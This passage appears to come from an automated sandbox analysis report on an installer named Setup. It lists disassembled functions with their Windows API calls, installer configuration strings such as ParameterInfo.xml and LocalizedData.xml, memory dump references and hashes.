                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: File$FindH_prolog3Path$AppendCloseCreateException@8ExistsFirstFreeH_prolog3_InitializeInstanceModuleNameStringThrowUninitialize_memcpy_s_memset
                                                              • String ID: LocalizedData.xml$LocalizedData.xml in resource folder %s, does not have a Language element$LocalizedData.xml is missing in resource folder %s. Every resource folder needs a LocalizedData.xml$ParameterInfo.xml
                                                              • API String ID: 2922719316-412676173
                                                              • Opcode ID: 241ad25c5bea36a44d33f79f45874aeabba67f657b5a493bee9b0c569caa2217
                                                              • Instruction ID: d5603774c16df7a59aaae5fe527f85e24b11558ca9f8608bebd73f9131b50789
                                                              • Opcode Fuzzy Hash: 241ad25c5bea36a44d33f79f45874aeabba67f657b5a493bee9b0c569caa2217
                                                              • Instruction Fuzzy Hash: FF616B724183859FC710DFA8C844A8AB7E8BFA5318F044A5DF0E597B95DB34E909CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C924DC0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 99COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C924DC7
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C948CD5: __EH_prolog3.LIBCMT ref: 6C948CDC
                                                                • Part of subcall function 6C948C7A: __EH_prolog3.LIBCMT ref: 6C948C81
                                                                • Part of subcall function 6C948C24: __EH_prolog3.LIBCMT ref: 6C948C2B
                                                                • Part of subcall function 6C91838A: __EH_prolog3.LIBCMT ref: 6C918391
                                                                • Part of subcall function 6C918415: __EH_prolog3.LIBCMT ref: 6C91841C
                                                                • Part of subcall function 6C91A378: __EH_prolog3.LIBCMT ref: 6C91A37F
                                                              • __CxxThrowException@8.LIBCMT ref: 6C924ED4
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                              Strings
                                                              • ParameterInfo.xml, xrefs: 6C924DE8
                                                              • \LocalizedData.xml. Duplicates not allowed., xrefs: 6C924E34
                                                              • Found duplicate ID attribute ", xrefs: 6C924DF8
                                                              • " for Text element in , xrefs: 6C924E0D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$DispatcherExceptionException@8ThrowUser
                                                              • String ID: " for Text element in $Found duplicate ID attribute "$ParameterInfo.xml$\LocalizedData.xml. Duplicates not allowed.
                                                              • API String ID: 3417717588-3340550128
                                                              • Opcode ID: 91965a3a038d4893ef702c599d00274d22749701a5c0be8ef73491ae15f064a9
                                                              • Instruction ID: 529f91b6eb9fd8d3ae14329ec832b1e8bec575d82e4fb89928c24f1fa4138197
                                                              • Opcode Fuzzy Hash: 91965a3a038d4893ef702c599d00274d22749701a5c0be8ef73491ae15f064a9
                                                              • Instruction Fuzzy Hash: 26414E72811008EFDB14DBE8C950AEDB7B8AF39368F148245F125E7BC1DB30DA5987A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C95401F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 98threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C954026
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • GetThreadLocale.KERNEL32(?,DHTMLHeader.html), ref: 6C954041
                                                              • GetModuleFileNameW.KERNEL32(6C8F0000,00000010,00000104), ref: 6C9540B3
                                                              • PathFileExistsW.SHLWAPI(?,00000014,00000000), ref: 6C954101
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: FileH_prolog3$ExistsLocaleModuleNamePathThread
                                                              • String ID: %04d\%s$DHTMLHeader.html
                                                              • API String ID: 3575165106-1224721414
                                                              • Opcode ID: 6b0fcbd5d38f7a3ef4ea49ed0840ca86c84f24dda2ba13e3b2a27f5523ebdb28
                                                              • Instruction ID: ec3627bce43d9b1abb69b2d02acfa6fbef2ea5380023704ef7cc86419879d3a1
                                                              • Opcode Fuzzy Hash: 6b0fcbd5d38f7a3ef4ea49ed0840ca86c84f24dda2ba13e3b2a27f5523ebdb28
                                                              • Instruction Fuzzy Hash: 79418E71A0010ADFDF04DFA4C888AEEBBB5BF21358F044529E111E7B91DB30DA19CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C4930B1 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 6C4A6041: __EH_prolog3.LIBCMT ref: 6C4A6048
                                                                • Part of subcall function 6C4A6041: GetCommandLineW.KERNEL32(0000001C,6C4930C2,?), ref: 6C4A604D
                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,?,?), ref: 6C493136
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CommandExceptionH_prolog3LineRaise
                                                              • String ID: CreateLayout$Install$Repair$Uninstall$UninstallPatch
                                                              • API String ID: 683617612-791770018
                                                              • Opcode ID: e718444658bb634a4b2683663ee2da5cdb395cc66e13a7c4f3595370d43e6a15
                                                              • Instruction ID: a904034bb7716b55e25c6764054f381369d4eb935863723d3771ecf678c526fa
                                                              • Opcode Fuzzy Hash: e718444658bb634a4b2683663ee2da5cdb395cc66e13a7c4f3595370d43e6a15
                                                              • Instruction Fuzzy Hash: 3601F072145968A7DA30D75DC806F86BF79EB83768F168015FA1C87F44DB32D4478291
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C4B2184 Relevance: 10.6, APIs: 7, Instructions: 56memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000000,0000000D), ref: 6C4B21A5
                                                              • HeapAlloc.KERNEL32(00000000), ref: 6C4B21AC
                                                                • Part of subcall function 6C4B20F9: IsProcessorFeaturePresent.KERNEL32(0000000C), ref: 6C4B20FB
                                                              • InterlockedPopEntrySList.KERNEL32(00846238), ref: 6C4B21BF
                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 6C4B21D0
                                                              • InterlockedPopEntrySList.KERNEL32 ref: 6C4B21E8
                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6C4B21F8
                                                              • InterlockedPushEntrySList.KERNEL32(00000000), ref: 6C4B220F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: EntryInterlockedList$AllocHeapVirtual$FeatureFreePresentProcessProcessorPush
                                                              • String ID:
                                                              • API String ID: 2304957937-0
                                                              • Opcode ID: 770dd855a2c4d18a0646ea9fddd4f88a46130288eebd424b25768eb9cdff1de6
                                                              • Instruction ID: fecf167ce10d9df066a5dc82ce53f8667c16784db64a7dc74364b7d915730084
                                                              • Opcode Fuzzy Hash: 770dd855a2c4d18a0646ea9fddd4f88a46130288eebd424b25768eb9cdff1de6
                                                              • Instruction Fuzzy Hash: E501F931385A1197DB31E7A88C0CF4A36B4BB4B786F150529FE14F7A48CE70D80257B1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C4933F3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C4933FA
                                                              • LoadLibraryW.KERNEL32(?,00000008,6C493377,?), ref: 6C493427
                                                              • GetLastError.KERNEL32 ref: 6C493437
                                                                • Part of subcall function 6C48B93E: __EH_prolog3.LIBCMT ref: 6C48B945
                                                              • GetLastError.KERNEL32 ref: 6C49344B
                                                              • __CxxThrowException@8.LIBCMT ref: 6C49346E
                                                              Strings
                                                              • ::LoadLibrary(%s) failed with error %d, xrefs: 6C49343C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorH_prolog3Last$Exception@8LibraryLoadThrow
                                                              • String ID: ::LoadLibrary(%s) failed with error %d
                                                              • API String ID: 3804648058-20907036
                                                              • Opcode ID: 842e87b8f50c2c963f9c6768f5ed87b659d2c2eb9c018a511950f6de0433bfab
                                                              • Instruction ID: f812c2fc176bf1f2f0c361aa395dee6318af069d6a83028526990d6b03e12970
                                                              • Opcode Fuzzy Hash: 842e87b8f50c2c963f9c6768f5ed87b659d2c2eb9c018a511950f6de0433bfab
                                                              • Instruction Fuzzy Hash: 3C01BCB19011069FDB00DBA8C805FAEBEB0FF02304F108529E418EBB54DB31D9158BE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C915485 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C91548C
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,0000002C,6C917DAF,?,?,?,?,?,00000000,?,?,6C90AB18,00000008,6C917CD9), ref: 6C91549C
                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 6C9154B9
                                                              • GetNativeSystemInfo.KERNEL32(?), ref: 6C9154E0
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$AddressHandleInfoModuleNativeProcSystem
                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                              • API String ID: 2427612476-192647395
                                                              • Opcode ID: 8c148f4bc6aa7567a45c0d70139dd223e0b8b31857367c0fd83e3290852088c4
                                                              • Instruction ID: 319c6a4a0cac0522a17eec928eb92dfb739e41339b42a5b94d2a5154e76b1972
                                                              • Opcode Fuzzy Hash: 8c148f4bc6aa7567a45c0d70139dd223e0b8b31857367c0fd83e3290852088c4
                                                              • Instruction Fuzzy Hash: 59F09671B15609ABDB14DBA5D905BCD327AAFA0709F518825F000E7E40DBB8C505C7A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C943A10 Relevance: 9.1, APIs: 6, Instructions: 58COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSecurityDescriptorLength.ADVAPI32(?,6C90A5CC,?), ref: 6C943A1F
                                                              • _malloc.LIBCMT ref: 6C943A29
                                                                • Part of subcall function 6C96BFB3: __FF_MSGBANNER.LIBCMT ref: 6C96BFCC
                                                                • Part of subcall function 6C96BFB3: __NMSG_WRITE.LIBCMT ref: 6C96BFD3
                                                                • Part of subcall function 6C96BFB3: RtlAllocateHeap.NTDLL(00000000,00000001,?,6C94831D,00000000,?,6C96C0C9,6C94F845,00000C00,00000020,6C94F845,?), ref: 6C96BFF8
                                                              • GetSecurityDescriptorControl.ADVAPI32(?,00000002,6C947448), ref: 6C943A49
                                                              • _free.LIBCMT ref: 6C943A5D
                                                              • _memcpy_s.LIBCMT ref: 6C943A80
                                                              • MakeSelfRelativeSD.ADVAPI32(?,6C94744C,6C94744C), ref: 6C943A97
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: DescriptorSecurity$AllocateControlHeapLengthMakeRelativeSelf_free_malloc_memcpy_s
                                                              • String ID:
                                                              • API String ID: 2479111529-0
                                                              • Opcode ID: 78416dca488951313f1ce607948676ae133c084726cb9ea94fca92c5eb522ee7
                                                              • Instruction ID: cd5ef291faa21a4cb1058b311598b3d3dba7d6683b7dc24d0f6f43f375b9c2e6
                                                              • Opcode Fuzzy Hash: 78416dca488951313f1ce607948676ae133c084726cb9ea94fca92c5eb522ee7
                                                              • Instruction Fuzzy Hash: 0211C872940204BBEB119BB69804EAFBBFCFF95658F10802AF515E3E40EB30D645D7A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C94F8D1 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_catch.LIBCMT ref: 6C94F8D8
                                                              • GetCommandLineW.KERNEL32(00000044,6C948323,00000000), ref: 6C94F8EA
                                                                • Part of subcall function 6C913E77: __EH_prolog3.LIBCMT ref: 6C913E7E
                                                              • __time64.LIBCMT ref: 6C94FA7B
                                                                • Part of subcall function 6C9472E4: __EH_prolog3_catch.LIBCMT ref: 6C9472EB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_catch$CommandH_prolog3Line__time64
                                                              • String ID: %TEMP%\$Setup
                                                              • API String ID: 3716462386-3413213476
                                                              • Opcode ID: fb6ebf3dabb018811a1f6b85f11b12be22912a0e7d7fd600c6cf39cdfd70a07d
                                                              • Instruction ID: 6fa7aad2bf124276ee2f8e1f4293b4e8aaf515c511c59d27478a4470aecb47f3
                                                              • Opcode Fuzzy Hash: fb6ebf3dabb018811a1f6b85f11b12be22912a0e7d7fd600c6cf39cdfd70a07d
                                                              • Instruction Fuzzy Hash: BE7138719012499FCF04CFE8C984AEDBBB5BF69318F24415AE011BBB90DB34DA48CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C933EB2 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 157COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C933EB9
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: ProcessBlocks$ProductDriveHints$ServiceBlocks$SystemCheck
                                                              • API String ID: 431132790-3784926136
                                                              • Opcode ID: 9cec193e00c16fef90edaf7d3954423766bcbe789e914f19bb156b116905e6fe
                                                              • Instruction ID: ff39c9d5f84cc59cc2d5adc930c5d0f291b860fb2855367149232813b56a31da
                                                              • Opcode Fuzzy Hash: 9cec193e00c16fef90edaf7d3954423766bcbe789e914f19bb156b116905e6fe
                                                              • Instruction Fuzzy Hash: 6E518A71904249EFDF10DFA8C945AEE7BB8AF29318F148459F814EBB81C734DA05CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C945691 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 151COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C945698
                                                              • PathIsRelativeW.SHLWAPI(00000000,?), ref: 6C945735
                                                              • PathFileExistsW.SHLWAPI(00000001,?), ref: 6C9457C3
                                                              Strings
                                                              • pLocalPath is NULL!!!!!!, xrefs: 6C94585B
                                                              • Package authoring error. The Url for this item is not authored and the item does not exist locally: , xrefs: 6C9457FB
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Path$ExistsFileH_prolog3Relative
                                                              • String ID: Package authoring error. The Url for this item is not authored and the item does not exist locally: $pLocalPath is NULL!!!!!!
                                                              • API String ID: 1035510722-3253188715
                                                              • Opcode ID: e1b9fbfb78e4718b8743db916b05e1106457ebb3ce85979047f4a9b82abf5e03
                                                              • Instruction ID: ccaad15fe044aac28962a97a985f3ead4455dc2ab3aac34869e2dcc37b7552b7
                                                              • Opcode Fuzzy Hash: e1b9fbfb78e4718b8743db916b05e1106457ebb3ce85979047f4a9b82abf5e03
                                                              • Instruction Fuzzy Hash: FC51B471901109EFDB10DFE8C8449EE7BB8AF26358F148166E514EBB91D730DE49CBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C923480 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 139COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C923487
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C9233F7: __EH_prolog3.LIBCMT ref: 6C9233FE
                                                                • Part of subcall function 6C9189B7: __EH_prolog3.LIBCMT ref: 6C9189BE
                                                                • Part of subcall function 6C9189B7: __CxxThrowException@8.LIBCMT ref: 6C918A89
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: Delay$ItemRef$Limit$Retry
                                                              • API String ID: 2489616738-1309351307
                                                              • Opcode ID: 69f5e156a1a0f7ee55e755138dce2a7436c11b3b33a1681f7fdf678398d9029b
                                                              • Instruction ID: a69db6ce9e1735884effc9c4e1a4850643b594609b46623169caf460bef841aa
                                                              • Opcode Fuzzy Hash: 69f5e156a1a0f7ee55e755138dce2a7436c11b3b33a1681f7fdf678398d9029b
                                                              • Instruction Fuzzy Hash: 6E515E71A10209EFDF00CFB8C945AAEBBB9BF25308F244459E458EBB80D735DA05CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C920E96 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 136COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C920E9D
                                                                • Part of subcall function 6C918B9F: __EH_prolog3.LIBCMT ref: 6C918BA6
                                                              • __CxxThrowException@8.LIBCMT ref: 6C921011
                                                              Strings
                                                              • schema validation failure: , xrefs: 6C920F73
                                                              • ParameterInfo.xml, xrefs: 6C920F63
                                                              • must have exactly 2 child nodes, xrefs: 6C920F88
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: must have exactly 2 child nodes$ParameterInfo.xml$schema validation failure:
                                                              • API String ID: 2489616738-936724439
                                                              • Opcode ID: 8cea0e27fc629df51b3c0e7206f596d6a04a3bc781d248d7f92d7264b3309570
                                                              • Instruction ID: 584b9591381473dfa7ae9bf842c81e5ccc0acbde79d06000c438f8aa40da8f51
                                                              • Opcode Fuzzy Hash: 8cea0e27fc629df51b3c0e7206f596d6a04a3bc781d248d7f92d7264b3309570
                                                              • Instruction Fuzzy Hash: 4B51AF71901248AFDB14CFE8C955BEEBBB8AF25318F148559E015DBB80CB31DA05CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9211F6 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 109COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9211FD
                                                                • Part of subcall function 6C918B9F: __EH_prolog3.LIBCMT ref: 6C918BA6
                                                              • __CxxThrowException@8.LIBCMT ref: 6C92132C
                                                              Strings
                                                              • ParameterInfo.xml, xrefs: 6C9212AD
                                                              • Not, xrefs: 6C921240
                                                              • schema validation failure: Not must have exactly 1 child node, xrefs: 6C92129F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
